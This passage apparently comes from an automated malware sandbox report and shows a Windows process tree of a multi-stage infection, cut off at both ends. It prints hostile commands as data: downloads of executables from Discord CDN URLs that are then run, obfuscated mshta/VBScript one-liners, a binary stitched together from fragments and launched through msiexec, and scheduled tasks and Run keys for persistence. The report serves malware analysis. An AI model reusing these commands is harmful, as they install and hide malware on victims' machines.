                                                                                    • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                      "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                      8⤵
                                                                                        PID:5076
                                                                                      • C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
                                                                                        "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
                                                                                        8⤵
                                                                                        • Checks whether UAC is enabled
                                                                                        • Drops file in Program Files directory
                                                                                        PID:2252
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\8QS5QO54Pu7CmqPq1QMNVpdP.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\8QS5QO54Pu7CmqPq1QMNVpdP.exe"
                                                                                      7⤵
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks whether UAC is enabled
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      PID:6604
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\u3cRqTdVGtXPgh8ADvnvPDLI.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\u3cRqTdVGtXPgh8ADvnvPDLI.exe"
                                                                                      7⤵
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks whether UAC is enabled
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      PID:6592
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\PxZ8UI6mifYkoYl3a6RLFIRc.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\PxZ8UI6mifYkoYl3a6RLFIRc.exe"
                                                                                      7⤵
                                                                                        PID:6584
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\k0TXFOp3H5JxB39Nd0AgP7Fb.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\k0TXFOp3H5JxB39Nd0AgP7Fb.exe"
                                                                                        7⤵
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:6548
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\k0TXFOp3H5JxB39Nd0AgP7Fb.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\k0TXFOp3H5JxB39Nd0AgP7Fb.exe"
                                                                                          8⤵
                                                                                            PID:7396
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\mbqtmEoq2yLOhYkBnJknXxjC.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\mbqtmEoq2yLOhYkBnJknXxjC.exe"
                                                                                          7⤵
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:6852
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\oB2x5G23PqGLN_dcI6m33Hqc.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\oB2x5G23PqGLN_dcI6m33Hqc.exe"
                                                                                          7⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:6948
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\oB2x5G23PqGLN_dcI6m33Hqc.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\oB2x5G23PqGLN_dcI6m33Hqc.exe"
                                                                                            8⤵
                                                                                              PID:5048
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\2X_oqUkYKyg5tm9hJDe9JgpK.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\2X_oqUkYKyg5tm9hJDe9JgpK.exe"
                                                                                            7⤵
                                                                                              PID:6644
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\4EE4.bat "C:\Users\Admin\Pictures\Adobe Films\2X_oqUkYKyg5tm9hJDe9JgpK.exe""
                                                                                                8⤵
                                                                                                  PID:2788
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                                                                                                    9⤵
                                                                                                      PID:8140
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754480883597312/18.exe" "18.exe" "" "" "" "" "" ""
                                                                                                      9⤵
                                                                                                        PID:1368
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754503507652688/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
                                                                                                        9⤵
                                                                                                          PID:7640
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4582\18.exe
                                                                                                          18.exe
                                                                                                          9⤵
                                                                                                            PID:7980
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4582\Transmissibility.exe
                                                                                                            Transmissibility.exe
                                                                                                            9⤵
                                                                                                              PID:7916
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                                                                                                              9⤵
                                                                                                                PID:4888
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\FVg5dIcYh8MQcezkMZUKRnJw.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\FVg5dIcYh8MQcezkMZUKRnJw.exe"
                                                                                                            7⤵
                                                                                                            • Checks whether UAC is enabled
                                                                                                            PID:6832
                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX2\demimondaines.vbs"
                                                                                                              8⤵
                                                                                                                PID:7556
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\adorning.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\adorning.exe" -pgexttyzmupbgtedvwhlgstporlwudq
                                                                                                                  9⤵
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  PID:7624
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\lierne.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX3\lierne.exe"
                                                                                                                    10⤵
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:5468
                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                                                                                      11⤵
                                                                                                                        PID:2556
                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\RmAEbkxy08cLllgKYBk96wod.exe
                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\RmAEbkxy08cLllgKYBk96wod.exe"
                                                                                                                7⤵
                                                                                                                  PID:2632
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\vRPeoOe1mIWiEt7qCOcg_mkL.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\vRPeoOe1mIWiEt7qCOcg_mkL.exe"
                                                                                                                  7⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:5608
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                    8⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Adds Run key to start application
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    PID:8052
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                                                                                      9⤵
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      PID:8304
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f8,0x1fc,0x200,0x1d4,0x204,0x7ff877eadec0,0x7ff877eaded0,0x7ff877eadee0
                                                                                                                        10⤵
                                                                                                                          PID:7700
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1720,5525722587339380748,4767359402503815464,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8304_2109337628" --mojo-platform-channel-handle=1848 /prefetch:8
                                                                                                                          10⤵
                                                                                                                            PID:2132
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1720,5525722587339380748,4767359402503815464,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8304_2109337628" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1780 /prefetch:2
                                                                                                                            10⤵
                                                                                                                              PID:6252
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c Mon173a360b525.exe
                                                                                                                    5⤵
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:1960
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon173a360b525.exe
                                                                                                                      Mon173a360b525.exe
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5008
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1378909358.exe"
                                                                                                                        7⤵
                                                                                                                          PID:4592
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1378909358.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1378909358.exe"
                                                                                                                            8⤵
                                                                                                                              PID:4216
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\6286259440.exe"
                                                                                                                            7⤵
                                                                                                                              PID:5928
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6286259440.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\6286259440.exe"
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5940
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "Mon173a360b525.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon173a360b525.exe" & exit
                                                                                                                              7⤵
                                                                                                                                PID:7320
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill /im "Mon173a360b525.exe" /f
                                                                                                                                  8⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:6508
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c Mon179f74c0ff3cf1f.exe
                                                                                                                            5⤵
                                                                                                                              PID:2900
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon179f74c0ff3cf1f.exe
                                                                                                                                Mon179f74c0ff3cf1f.exe
                                                                                                                                6⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Checks computer location settings
                                                                                                                                PID:988
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\mTeABXpBzcGCUGPGqC7x3nV1.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\mTeABXpBzcGCUGPGqC7x3nV1.exe"
                                                                                                                                  7⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:5156
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\13DXiLTMa1hLpSFPz4hnS78R.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\13DXiLTMa1hLpSFPz4hnS78R.exe"
                                                                                                                                  7⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:5912
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\13DXiLTMa1hLpSFPz4hnS78R.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\13DXiLTMa1hLpSFPz4hnS78R.exe"
                                                                                                                                    8⤵
                                                                                                                                      PID:7272
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\JaCAPd06FlDmrpOxihzFv2Ya.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\JaCAPd06FlDmrpOxihzFv2Ya.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4692
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\CXGvGSzadJsTx1qTxImyPp7A.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\CXGvGSzadJsTx1qTxImyPp7A.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    PID:6184
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\i9iBfSFpiJLNYdkx4pTJj13W.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\i9iBfSFpiJLNYdkx4pTJj13W.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    PID:1372
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\W9xWu_AEnKs623Q9RYQ1dIrL.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\W9xWu_AEnKs623Q9RYQ1dIrL.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:2928
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\ejmyMi7AtBevIn8DRICZl6av.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\ejmyMi7AtBevIn8DRICZl6av.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    PID:1552
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                      8⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:6732
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                      8⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:1988
                                                                                                                                    • C:\Users\Admin\Documents\GnF7HaoQK81Ivyv8nyx9jPhh.exe
                                                                                                                                      "C:\Users\Admin\Documents\GnF7HaoQK81Ivyv8nyx9jPhh.exe"
                                                                                                                                      8⤵
                                                                                                                                        PID:7424
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\zMjI_8K8Q84OeL8sLmItXmSr.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\zMjI_8K8Q84OeL8sLmItXmSr.exe"
                                                                                                                                          9⤵
                                                                                                                                            PID:1316
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\MP3j7z4lRZhS6aiY4zSqJ4fH.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\MP3j7z4lRZhS6aiY4zSqJ4fH.exe"
                                                                                                                                            9⤵
                                                                                                                                              PID:7080
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\a1ohz7L8cj47IFCOWCtIwgDi.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\a1ohz7L8cj47IFCOWCtIwgDi.exe"
                                                                                                                                              9⤵
                                                                                                                                                PID:8180
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                  10⤵
                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                  PID:2468
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                                    11⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:7064
                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\pPg9gR09BXK6mbu2BNNejH5P.exe
                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\pPg9gR09BXK6mbu2BNNejH5P.exe"
                                                                                                                                                9⤵
                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                PID:6436
                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe
                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe"
                                                                                                                                                9⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                PID:6432
                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                  10⤵
                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                  PID:3056
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                    11⤵
                                                                                                                                                      PID:3348
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                                        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                                        12⤵
                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                        PID:7356
                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                          13⤵
                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                          PID:2572
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                            14⤵
                                                                                                                                                              PID:7620
                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                            "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                            13⤵
                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                            PID:7100
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                              14⤵
                                                                                                                                                                PID:6344
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                  15⤵
                                                                                                                                                                    PID:6848
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                                    15⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:5360
                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                    15⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:4216
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill -f -iM "wkXv2fTh4gd_QhZD3v2cNXAC.exe"
                                                                                                                                                              12⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              PID:2032
                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\wZVnvy2IVTzCaL9M575mmBDx.exe
                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\wZVnvy2IVTzCaL9M575mmBDx.exe"
                                                                                                                                                        9⤵
                                                                                                                                                          PID:5440
                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\V5QkACUZs6HpWtXhCwXQlkbI.exe
                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\V5QkACUZs6HpWtXhCwXQlkbI.exe"
                                                                                                                                                          9⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:6120
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                            10⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            PID:5192
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                                                                                                                              11⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                              PID:7424
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1e8,0x1ec,0x1f0,0x1cc,0x1f4,0x7ff877eadec0,0x7ff877eaded0,0x7ff877eadee0
                                                                                                                                                                12⤵
                                                                                                                                                                  PID:7864
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x138,0x13c,0x140,0x114,0x144,0x7ff79e239e70,0x7ff79e239e80,0x7ff79e239e90
                                                                                                                                                                    13⤵
                                                                                                                                                                      PID:3252
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1820 /prefetch:2
                                                                                                                                                                    12⤵
                                                                                                                                                                      PID:8620
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=1868 /prefetch:8
                                                                                                                                                                      12⤵
                                                                                                                                                                        PID:8728
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=2304 /prefetch:8
                                                                                                                                                                        12⤵
                                                                                                                                                                          PID:8784
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
